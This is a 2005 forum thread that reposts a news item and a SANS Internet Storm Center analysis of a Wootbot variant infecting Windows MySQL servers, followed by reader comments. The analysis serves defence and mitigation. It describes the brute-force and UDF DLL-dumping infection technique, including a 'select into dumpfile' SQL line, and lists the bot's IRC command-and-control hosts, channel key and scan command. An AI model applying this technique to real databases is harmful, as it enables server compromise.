Posted on 01/27/2005 7:08:11 PM PST by Eagle9
Security experts are tracking a new malware variant, targeting the MySQL open-source database, which has likely infected thousands of Windows systems.
According to a report posted on the SANS Institute's Internet Storm Center site by SANS chief technology office Johannes Ullrich, the attacking code is a variant of an existing strain of nework "bot" known as "Wootbot." This variant is especially notable, said experts, since it is one of the first to target MySQL.
As with similar types of malware, the bot runs in the background, allowing MySQL to run normally while it contacts a remote Internet Relay Chat (IRC) server for additional instructions. In the report, Ullrich states that the bots' target IRC server was busy and unable to accept new connections when researchers last attempted to contact it. On earlier attempts, the IRC server showed around 8,500 connections, all of them likely due to infected MySQL installations.
According to Ullrich, the bot includes featues often found with this type of malware, including a DDoS (Distributed Denial of Service) capability, backdoor access to the server, and instructions to gather software keys and other sensitive information. Currently, however, none of these features are active; the only action the bot takes is to scan the Internet and local networks looking for vulnerable MySQL installations to infect.
The bot surfaced Wednesday, when a developer on an Australian Web forum reported an unknown application named "spoolcll.exe" that repeatedly tried to contact an IRC server in Sweden.
The bot, Ullrich noted, does not exploit a weakness in the MySQL code; rather, it carries a list of common passwords and launches a brute-force attack to access the root MySQL account. Administrators who use strong passwords, allow root access only from the local host, and apply strict firewall rules are unlikely to be compromised, he stated.
Unix and Linux systems running MySQL currently are not at risk from the bot.
MySQL, made by Swedish firm MySQL AB, is a popular open-source database often used to serve dynamically generated Web content or Web-based applications. According to MySQL AB, more than 5 million copies of the database are installed worldwide, including both Windows and non-Windows versions.
Appears to only affect Windows systems.
___________________________________________________
MySQL Bot
A "bot", exploiting vulnerable MySQL installs on Windows systems, has been spotted. It infected a few thousand systems so far. Like typical for bots, infected systems will connect to an IRC server. The IRC server will instruct them to scan various /8 networks for other vulnerable mysql servers.
Infection Method
The bot uses the "MySQL UDF Dynamic Library Exploit". In order to launch the exploit, the bot first has to authenticate to mysql as 'root' user. A long list of passwords is included with the bot, and the bot will brute force the password.
Once connected, the bot will create a table called 'bla' using the database 'mysql'. The 'mysql' database is typically used to store administrative information like passwords, and is part of every mysql install. The only field in this database is a BLOB named 'line'.
Once the table is created, the executable is written into the table using an insert statement. Then, the content of is written to a file called 'app_result.dll' using 'select * from bla into dumpfile "app_result.dll"'. The 'bla' table is dropped once the file is created.
In order to execute the 'app_result.dll', the bot creates a mysql function called 'app_result' which uses the 'app_result.dll' file saved earlier. This function is executed, and as a result the bot is loaded and run.
Post Infection Behavior
The bot will now try to connect to one out of a number of IRC servers:
dummylandingzone.hn.org -> 212.105.105.214
this have been disabled by respective dynamic dns providers(thanks!!):
landingzone.ath.cx -> 212.105.105.214
dummylandingzone.dyndns.org -> no such name
landingzone.dynamic-ip.us -> was: 212.105.105.214
dummylandingzone.dns2go.com -> 63.64.164.91 and 63.149.6.91
dummylandingzone.hn.org -> 212.105.105.214
dummylandingzone.dynu.com -> 212.105.105.214
zmoker.dns2go.com -> 63.64.164.91
landingzone.dynu.com -> was: 212.105.105.214
dummylandingzone.ipupdater.com -> 212.105.105.214
The bot will connect to the IRC server on port 5002 or 5003. At this point, the IRC servers appear busy and unable to accept new connections. Note that dynamic DNS services are used. The IP addresses will likely change. Last time we where able to connect, about 8,500 hosts where connected to the IRC server.
The bot will connect to a channel called '#rampenstampen' using the key 'gratisporn'. The topic of the channel is set to '!adv.start mysql 80 10 0 132.x.x.x -a -r -s'. This will instruct the bot to scan random ips in '132.0.0.0/8' for mysql server. Throughout our observation, the topic was changed regularly. To be scanned networks included 10.0.0.0/8, likely an attempt to infect other mysql servers within a local network that is otherwise protected by a firewall.
So far, the bot has been identified as a version of 'Wootbot'. It appears to include the usual set of bot features like a DDOS engine, various scanners, commands to solicit information from infected systems (e.g. system stats, software registration keys and such). The bot provides an FTP server, and a backdoors (details later. Appears to be listening on port 2301/tcp and 2304/tcp, maybe other ports).
Mitigation
This bot does not use any vulnerability in mysql. The fundamental weakness it uses is a week 'root' account. The following mitigation methods will prevent exploitation:
Strong Password: Select a strong password, in particular for the 'root' account.
Restricted root account: Connections for any account can be limited to certain hosts in MySQL. This is in particular important for 'root'. If possible, 'root' should only be allowed to connect from the local host. MySQL will also allow you to force connections to use mysql's own SSL connection option.
Apply firewall rules: MySQL servers should not be exposed to the "wild outside". Block port 3306 and only allow access from selected hosts that require such access. Again, the use of ssh forwarding or SSL is highly recommended.
For a one page cheat-sheet explaining how to setup passwords and disable network access in mysql, see:http://isc.sans.org/papers/secwinmysql.pdf
Detection
The port 3306 scanning should be quite obvious. If an infected host is not able to connect to the IRC server, you will still see port 5002 and 5003 connection attempts to the hosts shown above. If you have query logging configured on your DNS server, you will see lookups for the hostnames shown above. Note that the IPs will likely change over time.
Most antivirus scanners will detect the binary. Summary from Virustotal (as of 12:45 pm EST):
AntiVir 6.29.0.8/20050127 found nothing
AVG 718/20050127 found [BackDoor.Wootbot.4.S]
BitDefender 7.0/20050127 found nothing
ClamAV devel-20041205/20050127 found nothing
DrWeb 4.32b/20050127 found [Win32.HLLW.ForBot.based]
eTrust-Iris 7.1.194.0/20050127 found nothing
eTrust-Vet 11.7.0.0/20050127 found nothing
F-Prot 3.16a/20050127 found nothing
Kaspersky 4.0.2.24/20050127 found [Backdoor.Win32.Wootbot.gen]
NOD32v2 1.985/20050127 found [probably unknown NewHeur_PE]
Norman 5.70.10/20050127 found [W32/SDBot.gen2]
Panda 8.02.00/20050127 found nothing
Sybari 7.5.1314/20050127 found [Backdoor.Win32.Wootbot.gen]
Symantec 8.0/20050127 found [W32.Spybot.Worm]
Credits
Thanks to Evan for providing the sample of Spoolcll.exe (md5sum 18d3fe6ebabc4bed7008a9d3cb3713b9), our malware list, in particular Joe Stewart of LURHQ (http://www.lurhq.com ), our handlers, and the members of the Whirlpool forum (http://forums.whirlpool.net.au/forum-replies.cfm?t=291921 ).
--------
Johannes Ullrich (filling in for Deb Hale)
w00t
ping
AVG found it here, couple of days ago, I go all over, run a scan twice daily. I thought it said "woodbot", but with My old eyes I'm never sure. I could log on and the stuff would just go flying out without any input from Me.I ordered SP2, way back last August, it got lost in the mail, finally got the disc yesterday, after a phone call to MS, this old computer is working better today. I started having weird problems just about the time MS started pushing SP2 really hard, go figure! I was crashing 2 or 3 times a day, seems to be fine now. No more ooogly popups!
malware Ping--though this probably won't affect many users here on FR.
The foreign freeware mySQL is the problem. AND this has already been posted.
http://www.freerepublic.com/focus/f-chat/1330243/posts
This bug is less serious than Blaster was for MS-SQL, as its basically just a brute force attack on databases that allow root. This is like saying if someone allow external connections to a MSSQL database and I brute force their abc123 password its a problem with MSSQL..
I have to disagree with you again here. The worm inserts itself by using a brute-force method of using common passwords unti lone works. There is no vulnerability in the software itself--just the admins who administer it.
Right, unless a Windows user happens to be running the MySQL software, which I am not.
At least it's not as bad as the Slammer worm that took out so many MSSQL installations, an entire government got mad. BTW, it only works on Windows, while the "foreign freeware" Linux installation is immune.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.